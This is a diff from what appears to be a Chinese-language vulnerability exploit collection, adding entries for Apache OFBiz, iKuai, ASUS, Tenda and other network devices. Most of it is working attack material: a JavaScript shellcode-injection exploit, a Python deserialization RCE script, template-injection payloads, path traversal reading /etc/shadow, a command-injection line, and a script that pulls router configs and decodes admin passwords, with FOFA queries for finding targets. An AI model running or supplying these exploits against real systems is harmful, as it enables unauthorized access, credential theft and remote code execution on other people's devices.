return this.buffer_view.getUint32(kSlotOffset, true, ...this.prevent_opt);
}
this.setPtr = function (addr) {
this.buffer_view.setUint32(kBackingStoreOffset, addr, true, ...this.prevent_opt);
}
this.read32 = function (addr) {
this.setPtr(addr);
return this.page_view.getUint32(0, true, ...this.prevent_opt);
}
this.write32 = function (addr, value) {
this.setPtr(addr);
this.page_view.setUint32(0, value, true, ...this.prevent_opt);
}
this.write8 = function (addr, value) {
this.setPtr(addr);
this.page_view.setUint8(0, value, ...this.prevent_opt);
}
this.setBytes = function (addr, content) {
for (var i = 0; i < content.length; i++) {
this.write8(addr + i, content[i]);
}
}
return this;
}
function trigger() {
var oob = oobAccess();
var func_ptr = oob.leakPtr(target_function);
print('[*] target_function at 0x' + func_ptr.toString(16));
var kCodeInsOffset = 0x1b;
var code_addr = oob.read32(func_ptr + kCodeInsOffset);
print('[*] code_addr at 0x' + code_addr.toString(16));
oob.setBytes(code_addr, shellcode);
target_function(0);
}
try{
print("start running");
trigger();
}catch(e){
print(e);
}
```

158
开发框架漏洞/Apache OFBiz 反序列化 CVE-2021-30128.md Normal file
View File

@ -0,0 +1,158 @@
# Apache OFBiz 反序列化 CVE-2021-30128
## 漏洞描述
OfbizOpen for business是一个开源的基于J2EE和XML规范的用于构建大型企业级、跨平台、跨数据库、跨应用服务器的多层、分布式电子商务类WEB应用系统的框架Framework
参考链接:
- 阿里云分析https://mp.weixin.qq.com/s/Dr-jwiRr4NByjErjiX_e1w
- r0ckyhttps://mp.weixin.qq.com/s/ZBrWK3qsLwQs0v6dDi2_2A
- https://github.com/r0ckysec/CVE-2021-30128
- https://mp.weixin.qq.com/s/ZBrWK3qsLwQs0v6dDi2_2A
## 漏洞影响
```
Apache OFBiz < 17.12.07
```
## FOFA
```
app="Apache_OFBiz"
```
## 漏洞复现
poc
```
POST /webtools/control/SOAPService HTTP/1.1
Host: 192.168.80.145:8443
User-Agent: python-requests/2.24.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: text/xml
Content-Length: 6093
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://ofbiz.apache.org/service/">
<soapenv:Header/>
<soapenv:Body>
<ser>
<map-Map>
<map-Entry>
<map-Key> <cus-obj>ACED0005 ... ... 871007E000D78</cus-obj>
</map-Key>
<map-Value>
<std-String/>
</map-Value>
</map-Entry>
</map-Map>
</ser>
</soapenv:Body>
</soapenv:Envelope>
```
exp:
```py
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
@Author: r0cky
@Time: 2021/3/24-15:09
"""
import subprocess
import sys
import requests
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
def banner():
print("""
===================================================
____ ______ ____ _ ________ _______
/ __ \| ____| _ \(_) | ____\ \ / / __ \
| | | | |__ | |_) |_ ____ | |__ \ V /| |__) |
| | | | __| | _ <| |_ / | __| > < | ___/
| |__| | | | |_) | |/ / | |____ / . \| |
\____/|_| |____/|_/___| |______/_/ \_\_|
CVE-2021-30128 Powered by r0cky
===================================================
""")
def bypass(payload):
className = ['org.apache.commons.beanutils.BeanComparator', 'org.apache.commons.collections.comparators.ComparableComparator', 'com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl']
for cn in className:
len_hex = hex(len(cn)).replace('0x','').upper()
className_hex = cn.encode().hex().upper()
bypass_className = cn + '<java' + cn[cn.rfind('.'):]
bypass_len_hex = hex(len(bypass_className)).replace('0x','').upper()
bypass_className_hex = bypass_className.encode().hex().upper()
payload = payload.replace(len_hex + className_hex, bypass_len_hex + bypass_className_hex)
return payload
def exp(url, cmd):
popen = subprocess.Popen(['java', '-jar', 'ysoserial.jar', "CommonsBeanutils1", cmd], stdout=subprocess.PIPE)
payload = popen.stdout.read()
if len(payload) == 0:
print("请在当前脚本目录放置ysoserial.jar!")
exit(-1)
payload = payload.hex().upper()
post_data = bypass(payload)
print("[+] Payload:", post_data)
data = """
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://ofbiz.apache.org/service/">
<soapenv:Header/>
<soapenv:Body>
<ser>
<map-Map>
<map-Entry>
<map-Key>
<cus-obj>{}</cus-obj>
</map-Key>
<map-Value>
<std-String/>
</map-Value>
</map-Entry>
</map-Map>
</ser>
</soapenv:Body>
</soapenv:Envelope>
""".format(post_data)
print("[+] payload sending...")
r = requests.post(url, data=data, headers=headers, verify=False)
if r.status_code == 200:
print("[+] send payload success.")
print()
print("[END] Apache OFBiz RCE Done.")
else:
print("[-] send payload failed.")
print()
print("[END] Apache OFBiz RCE failed.")
headers={"Content-Type": "text/xml"}
if __name__ == '__main__':
banner()
try:
target = sys.argv[1]
cmd = sys.argv[2]
# target = "https://192.168.80.136:8443"
# vps_ip = "10.20.28.16"
# vps_port = "9999"
url = "{}/webtools/control/SOAPService".format(target)
exp(url, cmd)
except:
print("Example: \n\tpython3 " + sys.argv[0] + " <target> <cmd>\n")
```

34
开发框架漏洞/Apache OfBiz 服务器端模板注入 SSTI.md Normal file
View File

@ -0,0 +1,34 @@
# Apache OfBiz 服务器端模板注入 SSTI
## 漏洞描述
Apache OfBiz 17.12.01容易受到服务器端模板注入SSTI的影响从而导致远程代码执行RCE
参考链接:
- https://securitylab.github.com/advisories/GHSL-2020-067-apache_ofbiz
## 漏洞影响
```
Apache OfBiz 17.12.01
```
## FOFA
```
app="Apache_OFBiz"
```
## 漏洞复现
服务器端模板注入 renderLookupField
从不可信数据流request.getParameter("`_LAST_VIEW_NAME_`")给一个FreeMarker的宏调用定义。具有特权以渲染任何包含查找字段的页面的攻击者将能够通过发送有效载荷来执行任意系统命令。
poc
```
https://localhost:8443/ordermgr/control/FindQuote?_LAST_VIEW_NAME_=%22%2F%3E%24%7B%22freemarker.template.utility.Execute%22%3Fnew%28%29%28%22id%22%29%7D%3CFOO
```

24
开发框架漏洞/Apache OfBiz 远程代码执行 RCE.md Normal file
View File

@ -0,0 +1,24 @@
# Apache OfBiz 远程代码执行 RCE
## 漏洞描述
Apache OfBiz 17.12.01容易受到服务器端模板注入SSTI的影响从而导致远程代码执行RCE
参考链接:
- https://securitylab.github.com/advisories/GHSL-2020-066-apache_ofbiz
## FOFA
```
app="Apache_OFBiz"
```
## 漏洞复现
poc
```
https://localhost/ordermgr/control/FindRequest?foo=bar"ajaxEnabled=false/>${"freemarker.template.utility.Execute"?new()("id")}<FOO
```

38
网络设备漏洞/iKuai 后台任意文件读取漏洞.md Normal file
View File

@ -0,0 +1,38 @@
# iKuai 后台任意文件读取漏洞
## 漏洞描述
参考链接:
- https://forum.ywhack.com/thread-115307-1-8.html
## 影响版本
影响版本,不一定是绝对版本,也可能其它版本都存在:
```
3.2.8 x64 Build201910101758
```
## FOFA
```
title="登录爱快流控路由"
```
## 漏洞复现
默认用户名/密码admin/admin
poc
```
GET /Action/download?filename=../../../../../../etc/shadow HTTP/1.1
Host
....
```

BIN
网络设备漏洞/images/2-1620745285.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 244 KiB

BIN
网络设备漏洞/images/6-1620745283.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 107 KiB

44
网络设备漏洞/华硕 GT-AC2900 身份验证绕过 CVE-2021-32030.md Normal file
View File

@ -0,0 +1,44 @@
# 华硕 GT-AC2900 身份验证绕过 CVE-2021-32030
## 漏洞描述
ASUS GT-AC2900管理员应用程序在处理未经身份验证的用户的远程输入时容易受到身份验证绕过漏洞的攻击从而导致对管理员界面的未经授权的访问。
参考链接:
- https://github.com/atredispartners/advisories/blob/master/ATREDIS-2020-0010.md
## 漏洞影响
```
ASUS GT-AC2900韧体版本9.0.0.4.386.41994(测试版)
ASUS GT-AC2900韧体版本3.0.0.4.386.41793(最新生产)
```
## 漏洞复现
通过在auth_check添加空字符进行绕过身份验证。
poc
```
GET /appGet.cgi?hook=get_cfg_clientlist() HTTP/1.1
Host: 192.168.1.107:8443
Content-Length: 0
User-Agent: asusrouter--
Connection: close
Referer: https://192.168.1.107:8443/
Cookie: asus_token=\0Invalid; clickedItem_tab=0
HTTP/1.0 200 OK
Server: httpd/2.0
Content-Type: application/json;charset=UTF-8
Connection: close
{
"get_cfg_clientlist":[{"alias":"24:4B:FE:64:37:10","model_name":"GT-AC2900","ui_model_name":"GT-AC2900","fwver":"3.0.0.4.386_41793-gdb31cdc","newfwver":"","ip":"192.168.50.1","mac":"24:4B:FE:64:37:10","online":"1","ap2g":"24:4B:FE:64:37:10","ap5g":"24:4B:FE:64:37:14","ap5g1":"","apdwb":"","wired_mac":[
...
...
}
```

4
网络设备漏洞/启明星辰 天清汉马USG防火墙 逻辑缺陷漏洞.md → 网络设备漏洞/启明星辰 天清汉马USG防火墙 逻辑缺陷漏洞 CNVD-2021-12793.md
View File

@ -1,8 +1,8 @@
# 启明星辰 天清汉马USG防火墙 逻辑缺陷漏洞
# 启明星辰 天清汉马USG防火墙 逻辑缺陷漏洞 CNVD-2021-12793
## 漏洞描述
启明星辰 天清汉⻢USG防⽕墙 存在逻辑缺陷漏洞,攻击者通过账号密码可以进入后台后更改任意用户权限升级为管理员
启明星辰 天清汉⻢USG防⽕墙 存在逻辑缺陷漏洞,攻击者通过账号密码可以进入后台后更改任意用户权限升级为管理员
## 漏洞影响

30
网络设备漏洞/碧海威 L7多款产品 后台命令执行漏洞.md Normal file
View File

@ -0,0 +1,30 @@
# 碧海威 L7多款产品 后台命令执行漏洞
## 漏洞描述
碧海威 L7多款产品存在 后台命令执行漏洞,攻击者通过账号密码登录后台后,通过命令拼接造成命令注入。
## 漏洞影响
```
碧海威 L7多款产品
```
## 漏洞复现
登陆页面如下:
![碧海威 L7多款产品 后台命令执行漏洞](images/6-1620745283.png)
默认密码为 `adimn/admin or admin123`
漏洞存在于 命令控制台中,其中存在命令注入
![碧海威 L7多款产品 后台命令执行漏洞](images/2-1620745285.png)
可以使用 help & sh 得到交互式命令写入恶意文件
```
help&cat /etc/passwd
```

30
网络设备漏洞/腾达 路由器 AC11 堆栈缓冲区溢出 CVE-2021-31758.md Normal file
View File

@ -0,0 +1,30 @@
# 腾达路由器 AC11 堆栈缓冲区溢出 CVE-2021-31758
## 漏洞描述
在固件为02.03.01.104_CN的Tenda AC11设备上发现了一个问题。/goform/setportList 中的堆栈缓冲区溢出漏洞使攻击者可以通过精心设计的post请求在系统上执行任意代码。
参考链接:
- https://github.com/Yu3H0/IoT_CVE/tree/main/Tenda/CVE_2
## 漏洞复现
poc
```
POST /goform/setportList HTTP/1.1
Host: 192.168.0.1
Content-Length: 717
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36
Content-Type: application/x-www-form-urlencoded;
Accept: */*
Origin: http://192.168.0.1
Referer: http://192.168.0.1/index.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
module1=wifiBasicCfg&doubleBandUnityEnable=false&wifiTotalEn=true&wifiEn=true&wifiSSID=Tenda_B0E040&portList=1234aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&wifiSecurityMode=WPAWPA2%2FAES&wifiPwd=Password12345&wifiHideSSID=false&wifiEn_5G=true&wifiSSID_5G=Tenda_B0E040_5G&wifiSecurityMode_5G=WPAWPA2%2FAES&wifiPwd_5G=Password12345&wifiHideSSID_5G=false&module2=wifiGuest&guestEn=false&guestEn_5G=false&guestSSID=Tenda_VIP&guestSSID_5G=Tenda_VIP_5G&guestPwd=&guestPwd_5G=&guestValidTime=8&guestShareSpeed=0&module3=wifiPower&wifiPower=high&wifiPower_5G=high&module5=wifiAdvCfg&wifiMode=bgn&wifiChannel=auto&wifiBandwidth=auto&wifiMode_5G=ac&wifiChannel_5G=auto&wifiBandwidth_5G=auto&wifiAntijamEn=false&module6=wifiBeamforming&wifiBeaformingEn=true&module7=wifiWPS&wpsEn=true&wanType=static
```

170
网络设备漏洞/腾达 路由器 D151D31未经身份验证的配置下载.md Normal file
View File

@ -0,0 +1,170 @@
# 腾达路由器 D151/D31未经身份验证的配置下载
## 漏洞描述
攻击者可利用此漏洞,通过请求{IP}/goform/getimage即可下载当前路由器配置包括管理员登录名也可以通过请求激活telnet服务/goform/telnet默认情况下该服务已启用
## 漏洞影响
```
D301 1.2.11.2_EN
D301 V2.0 50.22.1.8_EN
D151 V2.0 50.21.1.5_EN
```
## 漏洞复现
poc
```python
import struct
import itertools
import random, sys
import requests
import base64
FETCH_CODE = "\x80\x0f\x07\xe7\x83i\xb0@v2\x9c\x8ef\x93y\xb8z"
ADMIN_LOG_CFG = {'AdminPassword': 'admin', 'SupportPassword': 'support'}
CLEAR_CODE = 256
END_OF_CODE = CLEAR_CODE + 1
MIN_WIDTH = 8
DEFAULT_MIN_BITS = MIN_WIDTH + 1
DEFAULT_MAX_BITS = 12
def cmsDecoder(compressed_cfg):
_cp_dict = dict((pt, struct.pack("B", pt)) for pt in range(256))
_cp_dict[CLEAR_CODE] = CLEAR_CODE
_cp_dict[END_OF_CODE] = END_OF_CODE
prefix, offset, ignore = None, 0, 0
codepoints_arr, remainder, bits = [], [], []
init_csize = len(_cp_dict)
codesize = init_csize
minwidth = MIN_WIDTH
while (1 << minwidth) < codesize:
minwidth = minwidth + 1
pointwidth = minwidth
buts_arr = []
for b in compressed_cfg:
value = struct.unpack("B", b)[0]
for bitplusone in range(8, 0, -1):
bitindex = bitplusone - 1
buts_arr.append(1 & (value >> bitindex))
for nextbit in buts_arr:
offset = (offset + 1) % 8
if ignore > 0:
ignore = ignore - 1
continue
bits.append(nextbit)
if len(bits) == pointwidth:
cp_int = 0
lsb_first = [b for b in bits]
lsb_first.reverse()
for bit_index in range(len(lsb_first)):
if lsb_first[bit_index]:
cp_int = cp_int | (1 << bit_index)
bits = []
codepoints_arr.append(cp_int)
codesize = codesize + 1
if cp_int in [CLEAR_CODE, END_OF_CODE]:
codesize = init_csize
pointwidth = minwidth
else:
while codesize >= (2 ** pointwidth):
pointwidth = pointwidth + 1
if cp_int == END_OF_CODE:
ignore = (8 - offset) % 8
decodedBytes = []
for cp_int in codepoints_arr:
suffix = ""
if cp_int == CLEAR_CODE:
_cp_dict = dict((pt, struct.pack("B", pt)) for pt in range(256))
_cp_dict[CLEAR_CODE] = CLEAR_CODE
_cp_dict[END_OF_CODE] = END_OF_CODE
prefix = None
elif cp_int != END_OF_CODE:
if cp_int in _cp_dict:
suffix = _cp_dict[cp_int]
if None != prefix:
_cp_dict[len(_cp_dict)] = prefix + suffix[0]
else:
suffix = prefix + prefix[0]
_cp_dict[len(_cp_dict)] = suffix
prefix = suffix
decoded = suffix
for char in decoded:
decodedBytes.append(char)
return decodedBytes
def exploit(ip):
print "[!] Downloading config"
try:
r = requests.get("http://{}/goform/getimage".format(ip))
pass
except:
print "[-] Failed to download the config, the target may not be vulnerable"
BIN_CONTENT = r.content
BIN_CONTENT = BIN_CONTENT[BIN_CONTENT.index(FETCH_CODE):][:16*50]
CONFIG_XML = b"".join(cmsDecoder(BIN_CONTENT))
USER_, PASS_ = "", ""
for i in ADMIN_LOG_CFG.keys():
if i in CONFIG_XML:
CONFIG_XML = CONFIG_XML[CONFIG_XML.index(i) + len(i) + 1:]
PASS_ = CONFIG_XML[:CONFIG_XML.index('</')]
USER_ = ADMIN_LOG_CFG[i]
print "\tusername: {}\n\tpassword: {}\n".format(USER_, base64.b64decode(PASS_).rstrip('\x00'))
return 0
print "[-] Failed to decode the config file\n"
return -1
if len(sys.argv) == 1:
print "usage: python2 " + sys.argv[0] + " router_ip"
print "example: python2 exploit.py http://192.168.1.1"
exit()
if __name__ == "__main__":
print """\
_ _
___ (~ )( ~)
/ \_\ \/ /
| D_ ]\ \/ -- By BenCh@li@h
| D _]/\ \ -- BenChaliah@github
\___/ / /\ \\
(_ )( _)
"""
try:
exploit(sys.argv[1])
except Exception as e:
print str(e)
```

2
网络设备漏洞/锐捷 Smartweb管理系统 密码信息泄露漏洞.md → 网络设备漏洞/锐捷 Smartweb管理系统 密码信息泄露漏洞 CNVD-2021-17369.md
View File

@ -1,4 +1,4 @@
# 锐捷 Smartweb管理系统 密码信息泄露漏洞
# 锐捷 Smartweb管理系统 密码信息泄露漏洞 CNVD-2021-17369
## 漏洞描述